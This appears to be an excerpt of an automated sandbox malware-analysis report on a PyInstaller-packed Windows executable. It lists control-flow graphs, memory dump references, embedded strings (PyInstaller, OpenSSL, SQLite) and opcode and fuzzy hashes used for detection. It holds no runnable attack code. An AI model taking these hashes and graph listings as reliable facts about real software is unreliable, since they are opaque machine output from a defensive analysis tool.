7ff72c653b45-7ff72c653b53 1281->1285 1284->1285 1288 7ff72c653a4d-7ff72c653a50 1284->1288 1286 7ff72c653a67 1285->1286 1287 7ff72c653b59-7ff72c653b5d 1285->1287 1289 7ff72c653a6b-7ff72c653a90 call 7ff72c664f30 1286->1289 1287->1289 1290 7ff72c653b14-7ff72c653b17 1288->1290 1291 7ff72c653a56-7ff72c653a5a 1288->1291 1299 7ff72c653aab-7ff72c653ac0 1289->1299 1300 7ff72c653a92-7ff72c653aa6 call 7ff72c658940 1289->1300 1294 7ff72c653b19-7ff72c653b1d 1290->1294 1295 7ff72c653b2f-7ff72c653b40 call 7ff72c652710 1290->1295 1291->1290 1293 7ff72c653a60 1291->1293 1293->1286 1294->1295 1298 7ff72c653b1f-7ff72c653b2a 1294->1298 1303 7ff72c653c7f-7ff72c653c87 1295->1303 1298->1289 1304 7ff72c653be8-7ff72c653bfa call 7ff72c658830 1299->1304 1305 7ff72c653ac6-7ff72c653aca 1299->1305 1300->1299 1303->1242 1313 7ff72c653bfc-7ff72c653c02 1304->1313 1314 7ff72c653c2e 1304->1314 1307 7ff72c653bcd-7ff72c653be2 call 7ff72c651940 1305->1307 1308 7ff72c653ad0-7ff72c653ae8 call 7ff72c665250 1305->1308 1307->1304 1307->1305 1318 7ff72c653aea-7ff72c653b02 call 7ff72c665250 1308->1318 1319 7ff72c653b62-7ff72c653b7a call 7ff72c665250 1308->1319 1316 7ff72c653c1e-7ff72c653c2c 1313->1316 1317 7ff72c653c04-7ff72c653c1c 1313->1317 1320 7ff72c653c31-7ff72c653c40 call 7ff72c664f30 1314->1320 1316->1320 1317->1320 1318->1307 1329 7ff72c653b08-7ff72c653b0f 1318->1329 1327 7ff72c653b7c-7ff72c653b80 1319->1327 1328 7ff72c653b87-7ff72c653b9f call 7ff72c665250 1319->1328 1330 7ff72c653c46-7ff72c653c4a 1320->1330 1331 7ff72c653d41-7ff72c653d63 call 7ff72c6544e0 1320->1331 1327->1328 1344 7ff72c653bac-7ff72c653bc4 call 7ff72c665250 1328->1344 1345 7ff72c653ba1-7ff72c653ba5 1328->1345 1329->1307 1334 7ff72c653cd4-7ff72c653ce6 call 7ff72c658830 1330->1334 1335 7ff72c653c50-7ff72c653c5f call 7ff72c6590e0 1330->1335 1342 7ff72c653d65-7ff72c653d6f call 7ff72c654630 1331->1342 1343 7ff72c653d71-7ff72c653d82 call 7ff72c651c80 1331->1343 1348 7ff72c653ce8-7ff72c653ceb 1334->1348 1349 7ff72c653d35-7ff72c653d3c 1334->1349 1346 7ff72c653cb3-7ff72c653cbd call 7ff72c658660 1335->1346 1347 7ff72c653c61 1335->1347 1356 7ff72c653d87-7ff72c653d96 1342->1356 1343->1356 1344->1307 1359 7ff72c653bc6 1344->1359 1345->1344 1369 7ff72c653cc8-7ff72c653ccf 1346->1369 1370 7ff72c653cbf-7ff72c653cc6 1346->1370 1353 7ff72c653c68 call 7ff72c652710 1347->1353 1348->1349 1354 7ff72c653ced-7ff72c653d10 call 7ff72c651c80 1348->1354 1349->1353 1365 7ff72c653c6d-7ff72c653c77 1353->1365 1371 7ff72c653d2b-7ff72c653d33 call 7ff72c664f30 1354->1371 1372 7ff72c653d12-7ff72c653d26 call 7ff72c652710 call 7ff72c664f30 1354->1372 1362 7ff72c653d98-7ff72c653d9f 1356->1362 1363 7ff72c653dc4-7ff72c653dda call 7ff72c659390 1356->1363 1359->1307 1362->1363 1367 7ff72c653da1-7ff72c653da5 1362->1367 1377 7ff72c653ddc 1363->1377 1378 7ff72c653de8-7ff72c653e04 SetDllDirectoryW 1363->1378 1365->1303 1367->1363 1373 7ff72c653da7-7ff72c653dbe SetDllDirectoryW LoadLibraryExW 1367->1373 1369->1356 1370->1353 1371->1356 1372->1365 1373->1363 1377->1378 1379 7ff72c653e0a-7ff72c653e19 call 7ff72c658830 1378->1379 1380 7ff72c653f01-7ff72c653f08 1378->1380 1393 7ff72c653e1b-7ff72c653e21 1379->1393 1394 7ff72c653e32-7ff72c653e3c call 7ff72c664f30 1379->1394 1385 7ff72c653f0e-7ff72c653f15 1380->1385 1386 7ff72c654008-7ff72c654010 1380->1386 1385->1386 1391 7ff72c653f1b-7ff72c653f25 call 7ff72c6533c0 1385->1391 1387 7ff72c654035-7ff72c654040 call 7ff72c6536a0 call 7ff72c653360 1386->1387 1388 7ff72c654012-7ff72c65402f PostMessageW GetMessageW 1386->1388 1405 7ff72c654045-7ff72c654067 call 7ff72c653670 call 7ff72c656fc0 call 7ff72c656d70 1387->1405 1388->1387 1391->1365 1401 7ff72c653f2b-7ff72c653f3f call 7ff72c6590c0 1391->1401 1398 7ff72c653e2d-7ff72c653e2f 1393->1398 1399 7ff72c653e23-7ff72c653e2b 1393->1399 1406 7ff72c653ef2-7ff72c653efc call 7ff72c658940 1394->1406 1407 7ff72c653e42-7ff72c653e48 1394->1407 1398->1394 1399->1398 1412 7ff72c653f64-7ff72c653fa7 call 7ff72c658940 call 7ff72c6589e0 call 7ff72c656fc0 call 7ff72c656d70 call 7ff72c6588e0 1401->1412 1413 7ff72c653f41-7ff72c653f5e PostMessageW GetMessageW 1401->1413 1406->1380 1407->1406 1411 7ff72c653e4e-7ff72c653e54 1407->1411 1415 7ff72c653e56-7ff72c653e58 1411->1415 1416 7ff72c653e5f-7ff72c653e61 1411->1416 1453 7ff72c653fa9-7ff72c653fbf call 7ff72c658ed0 call 7ff72c6588e0 1412->1453 1454 7ff72c653ff5-7ff72c654003 call 7ff72c651900 1412->1454 1413->1412 1417 7ff72c653e67-7ff72c653e83 call 7ff72c656dc0 call 7ff72c657340 1415->1417 1420 7ff72c653e5a 1415->1420 1416->1380 1416->1417 1432 7ff72c653e8e-7ff72c653e95 1417->1432 1433 7ff72c653e85-7ff72c653e8c 1417->1433 1420->1380 1436 7ff72c653e97-7ff72c653ea4 call 7ff72c656e00 1432->1436 1437 7ff72c653eaf-7ff72c653eb9 call 7ff72c6571b0 1432->1437 1435 7ff72c653edb-7ff72c653ef0 call 7ff72c652a50 call 7ff72c656fc0 call 7ff72c656d70 1433->1435 1435->1380 1436->1437 1448 7ff72c653ea6-7ff72c653ead 1436->1448 1449 7ff72c653ebb-7ff72c653ec2 1437->1449 1450 7ff72c653ec4-7ff72c653ed2 call 7ff72c6574f0 1437->1450 1448->1435 1449->1435 1450->1380 1460 7ff72c653ed4 1450->1460 1453->1454 1466 7ff72c653fc1-7ff72c653fd6 1453->1466 1454->1365 1460->1435 1467 7ff72c653fd8-7ff72c653feb call 7ff72c652710 call 7ff72c651900 1466->1467 1468 7ff72c653ff0 call 7ff72c652a50 1466->1468 1467->1365 1468->1454
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                  • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                  • Opcode ID: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                                  • Instruction ID: 622d26e9a56d379b62f4068e735e4b703384393e3ae7f8cd4b57c91dcd2d8ece
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 233ec7f25ec1ed803ce179537cd482b57a2e4efc6b2dbb8e538fcab84ef42543
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49329F21A0C68251FA17F7249C552B9A7A3FF64BE0FE84436DB4D426C6DF2CE558CB20
                                                                                                                                                                                                                                  Function 00007FFBA6091A0F Relevance: 23.6, APIs: 5, Strings: 8, Instructions: 858COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                                                                                  • API String ID: 0-2781224710
                                                                                                                                                                                                                                  • Opcode ID: bfd61e0b9a574f603b0776d19a675c1a396b8c51785310e0fbd2dcc6b7e53aed
                                                                                                                                                                                                                                  • Instruction ID: 72d3d99a3432094acccdd1da89d78c8214b8e2d5f3828977d1f0af4d5972e644
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfd61e0b9a574f603b0776d19a675c1a396b8c51785310e0fbd2dcc6b7e53aed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF828DE1E0A682C1FB639B31D4813B92692EF45F88F545635DE8D8B695DF3CE9A1C300
                                                                                                                                                                                                                                  Function 00007FFBA67A92B0 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 513COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2085 7ffba67a92b0-7ffba67a932f 2086 7ffba67a9335-7ffba67a933f 2085->2086 2087 7ffba67a948d-7ffba67a94a3 2085->2087 2086->2087 2088 7ffba67a9345-7ffba67a9348 2086->2088 2089 7ffba67a94a9-7ffba67a94af 2087->2089 2090 7ffba67a939f-7ffba67a93e5 call 7ffba6796180 2087->2090 2088->2089 2091 7ffba67a934e 2088->2091 2089->2090 2092 7ffba67a94b5-7ffba67a94cb call 7ffba6796180 2089->2092 2097 7ffba67a9a7e-7ffba67a9a81 2090->2097 2098 7ffba67a93eb-7ffba67a944f call 7ffba68c380c 2090->2098 2095 7ffba67a9355-7ffba67a935e 2091->2095 2102 7ffba67a9ade 2092->2102 2105 7ffba67a94d1-7ffba67a94ec 2092->2105 2095->2095 2099 7ffba67a9360-7ffba67a936f call 7ffba6796180 2095->2099 2101 7ffba67a9a83-7ffba67a9a8a 2097->2101 2097->2102 2113 7ffba67a9455-7ffba67a9471 00007FFBBB593010 2098->2113 2114 7ffba67a9778-7ffba67a9788 2098->2114 2099->2102 2115 7ffba67a9375-7ffba67a938b 00007FFBBB593010 2099->2115 2106 7ffba67a9ad5 2101->2106 2107 7ffba67a9a8c-7ffba67a9a96 2101->2107 2110 7ffba67a9ae3-7ffba67a9afa 2102->2110 2121 7ffba67a9506-7ffba67a950d 2105->2121 2122 7ffba67a94ee-7ffba67a94ff 2105->2122 2106->2102 2111 7ffba67a9a98 2107->2111 2112 7ffba67a9a9e-7ffba67a9acb 2107->2112 2111->2112 2112->2102 2145 7ffba67a9acd-7ffba67a9ad3 2112->2145 2117 7ffba67a9477-7ffba67a9488 00007FFBBB593010 2113->2117 2118 7ffba67a962b 2113->2118 2119 7ffba67a96cf-7ffba67a96f4 2114->2119 2120 7ffba67a9390-7ffba67a9397 2115->2120 2125 7ffba67a962e-7ffba67a9677 00007FFBBB593010 * 2 2117->2125 2118->2125 2126 7ffba67a96fa-7ffba67a96ff 2119->2126 2127 7ffba67a982f 2119->2127 2120->2120 2128 7ffba67a9399 2120->2128 2123 7ffba67a9510-7ffba67a9517 2121->2123 2122->2121 2123->2123 2132 7ffba67a9519-7ffba67a9520 2123->2132 2129 7ffba67a9679-7ffba67a9680 2125->2129 2130 7ffba67a96cd 2125->2130 2126->2127 2133 7ffba67a9705-7ffba67a9731 call 7ffba679ffd0 2126->2133 2131 7ffba67a9834-7ffba67a9842 2127->2131 2128->2090 2134 7ffba67a9686-7ffba67a9690 2129->2134 2135 7ffba67a976a-7ffba67a9773 2129->2135 2130->2119 2136 7ffba67a9845-7ffba67a9848 2131->2136 2137 7ffba67a9527-7ffba67a952e 2132->2137 2139 7ffba67a9734-7ffba67a9754 2133->2139 2140 7ffba67a9698-7ffba67a96c5 2134->2140 2141 7ffba67a9692 2134->2141 2135->2130 2142 7ffba67a984e-7ffba67a9869 call 7ffba67a8830 2136->2142 2143 7ffba67a98fb-7ffba67a9905 2136->2143 2137->2137 2144 7ffba67a9530-7ffba67a9547 2137->2144 2146 7ffba67a982a-7ffba67a982d 2139->2146 2147 7ffba67a975a-7ffba67a9764 2139->2147 2140->2130 2186 7ffba67a96c7 2140->2186 2141->2140 2142->2143 2166 7ffba67a986f-7ffba67a98f3 2142->2166 2152 7ffba67a9913-7ffba67a9926 call 7ffba67a46f0 2143->2152 2153 7ffba67a9907-7ffba67a9910 2143->2153 2149 7ffba67a9549 2144->2149 2150 7ffba67a9597-7ffba67a959e 2144->2150 2145->2102 2146->2136 2154 7ffba67a9766-7ffba67a9768 2147->2154 2155 7ffba67a978d-7ffba67a9790 2147->2155 2157 7ffba67a9550-7ffba67a9557 2149->2157 2159 7ffba67a95c2-7ffba67a95c9 2150->2159 2160 7ffba67a95a0-7ffba67a95a7 2150->2160 2171 7ffba67a992c-7ffba67a9936 2152->2171 2172 7ffba67a9a70-7ffba67a9a7c 2152->2172 2153->2152 2165 7ffba67a9792-7ffba67a979a 2154->2165 2155->2165 2167 7ffba67a9560-7ffba67a9569 2157->2167 2163 7ffba67a961a 2159->2163 2164 7ffba67a95cb-7ffba67a95d5 2159->2164 2160->2090 2168 7ffba67a95ad-7ffba67a95bc call 7ffba6855ae0 2160->2168 2188 7ffba67a9623-7ffba67a9626 2163->2188 2173 7ffba67a95d7 2164->2173 2174 7ffba67a95dd-7ffba67a960a 2164->2174 2178 7ffba67a97be-7ffba67a97d4 call 7ffba6856ad0 2165->2178 2179 7ffba67a979c-7ffba67a97b0 call 7ffba67a7c00 2165->2179 2192 7ffba67a98f5 2166->2192 2193 7ffba67a9959-7ffba67a995f 2166->2193 2167->2167 2175 7ffba67a956b-7ffba67a9579 2167->2175 2168->2090 2168->2159 2182 7ffba67a9938 2171->2182 2183 7ffba67a993e-7ffba67a9951 2171->2183 2172->2110 2173->2174 2174->2188 2209 7ffba67a960c-7ffba67a9615 2174->2209 2185 7ffba67a9580-7ffba67a9589 2175->2185 2197 7ffba67a97d6-7ffba67a97eb call 7ffba680df90 2178->2197 2198 7ffba67a97ed 2178->2198 2179->2178 2202 7ffba67a97b2-7ffba67a97b7 2179->2202 2182->2183 2183->2193 2185->2185 2194 7ffba67a958b-7ffba67a9595 2185->2194 2186->2130 2188->2110 2192->2143 2200 7ffba67a9988-7ffba67a9998 2193->2200 2201 7ffba67a9961-7ffba67a9984 2193->2201 2194->2150 2194->2157 2204 7ffba67a97ef-7ffba67a97f4 2197->2204 2198->2204 2212 7ffba67a999a 2200->2212 2213 7ffba67a99a0-7ffba67a99d1 2200->2213 2201->2200 2202->2178 2207 7ffba67a97f6-7ffba67a980c call 7ffba6856ad0 2204->2207 2208 7ffba67a9822-7ffba67a9828 2204->2208 2207->2146 2219 7ffba67a980e-7ffba67a9820 call 7ffba680df90 2207->2219 2208->2131 2209->2110 2212->2213 2216 7ffba67a99d3-7ffba67a99e2 2213->2216 2217 7ffba67a99e4-7ffba67a99eb 2213->2217 2218 7ffba67a99ef-7ffba67a9a11 call 7ffba67a7c00 2216->2218 2217->2218 2224 7ffba67a9a13-7ffba67a9a17 2218->2224 2225 7ffba67a9a19-7ffba67a9a1c 2218->2225 2219->2146 2219->2208 2226 7ffba67a9a27-7ffba67a9a39 2224->2226 2227 7ffba67a9a23 2225->2227 2228 7ffba67a9a1e-7ffba67a9a21 2225->2228 2229 7ffba67a9a44-7ffba67a9a56 2226->2229 2230 7ffba67a9a3b-7ffba67a9a42 2226->2230 2227->2226 2228->2226 2228->2227 2231 7ffba67a9a5a-7ffba67a9a6e 2229->2231 2230->2231 2231->2110
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B593010
                                                                                                                                                                                                                                  • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                  • API String ID: 2201947777-4201244970
                                                                                                                                                                                                                                  • Opcode ID: e71367e4caff7898d8f729e26418474fc89d99c24193eae94bfbfe729bf6114b
                                                                                                                                                                                                                                  • Instruction ID: ce75fc9be9f04938f4a923a17eb48d9ab8db264b8cc57d47b338fd143d9714f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e71367e4caff7898d8f729e26418474fc89d99c24193eae94bfbfe729bf6114b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C32BBE2A2A68286EB268F35D46037926A6FF54F94F084235CE6E477D4DF3CE465C340
                                                                                                                                                                                                                                  Function 00007FF72C676964 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2353 7ff72c676964-7ff72c6769d7 call 7ff72c676698 2356 7ff72c6769d9-7ff72c6769e2 call 7ff72c664ee8 2353->2356 2357 7ff72c6769f1-7ff72c6769fb call 7ff72c668520 2353->2357 2362 7ff72c6769e5-7ff72c6769ec call 7ff72c664f08 2356->2362 2363 7ff72c6769fd-7ff72c676a14 call 7ff72c664ee8 call 7ff72c664f08 2357->2363 2364 7ff72c676a16-7ff72c676a7f CreateFileW 2357->2364 2380 7ff72c676d32-7ff72c676d52 2362->2380 2363->2362 2365 7ff72c676afc-7ff72c676b07 GetFileType 2364->2365 2366 7ff72c676a81-7ff72c676a87 2364->2366 2372 7ff72c676b09-7ff72c676b44 GetLastError call 7ff72c664e7c CloseHandle 2365->2372 2373 7ff72c676b5a-7ff72c676b61 2365->2373 2369 7ff72c676ac9-7ff72c676af7 GetLastError call 7ff72c664e7c 2366->2369 2370 7ff72c676a89-7ff72c676a8d 2366->2370 2369->2362 2370->2369 2378 7ff72c676a8f-7ff72c676ac7 CreateFileW 2370->2378 2372->2362 2388 7ff72c676b4a-7ff72c676b55 call 7ff72c664f08 2372->2388 2376 7ff72c676b69-7ff72c676b6c 2373->2376 2377 7ff72c676b63-7ff72c676b67 2373->2377 2383 7ff72c676b72-7ff72c676bc7 call 7ff72c668438 2376->2383 2384 7ff72c676b6e 2376->2384 2377->2383 2378->2365 2378->2369 2391 7ff72c676bc9-7ff72c676bd5 call 7ff72c6768a0 2383->2391 2392 7ff72c676be6-7ff72c676c17 call 7ff72c676418 2383->2392 2384->2383 2388->2362 2391->2392 2400 7ff72c676bd7 2391->2400 2398 7ff72c676c1d-7ff72c676c5f 2392->2398 2399 7ff72c676c19-7ff72c676c1b 2392->2399 2402 7ff72c676c81-7ff72c676c8c 2398->2402 2403 7ff72c676c61-7ff72c676c65 2398->2403 2401 7ff72c676bd9-7ff72c676be1 call 7ff72c66aac0 2399->2401 2400->2401 2401->2380 2405 7ff72c676c92-7ff72c676c96 2402->2405 2406 7ff72c676d30 2402->2406 2403->2402 2404 7ff72c676c67-7ff72c676c7c 2403->2404 2404->2402 2405->2406 2408 7ff72c676c9c-7ff72c676ce1 CloseHandle CreateFileW 2405->2408 2406->2380 2410 7ff72c676d16-7ff72c676d2b 2408->2410 2411 7ff72c676ce3-7ff72c676d11 GetLastError call 7ff72c664e7c call 7ff72c668660 2408->2411 2410->2406 2411->2410
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                                                                                  • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                  • Instruction ID: c9a6c08779169ed6fbac53a333c9f426242b0e566be1c14cde0df1f5ee08c69c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69C10133B28A4285EB11EF64C8812AC7772FB99BA8F910639DE1E57794CF38D015CB10
                                                                                                                                                                                                                                  Function 00007FFBA6814C70 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952154128.00007FFBA6791000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFBA6790000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952109608.00007FFBA6790000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F1000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA68F3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952154128.00007FFBA6908000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952472915.00007FFBA690A000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952519785.00007FFBA690C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6790000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B593010
                                                                                                                                                                                                                                  • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                  • API String ID: 2201947777-1046679716
                                                                                                                                                                                                                                  • Opcode ID: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
                                                                                                                                                                                                                                  • Instruction ID: cca1cbd64ca5563cd9fcccbe9bbb653364e342cc630f1588832afc5e7e73e5f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f23d50979c88e00e17b4a476aebd8052426b92c118e75aeb5a3e9824675a78a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66F18DE2A0A68286EB66CF31D4107BA67AAFB85F98F084177DE4D07795DF7CE5408340
                                                                                                                                                                                                                                  Function 00007FFBAA4A71D0 Relevance: 6.9, APIs: 4, Instructions: 889librarymemoryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3300690313-0
                                                                                                                                                                                                                                  • Opcode ID: 05417be8f1839d801782f9c781979d9678e7c982b20de61a62ff485c284467e9
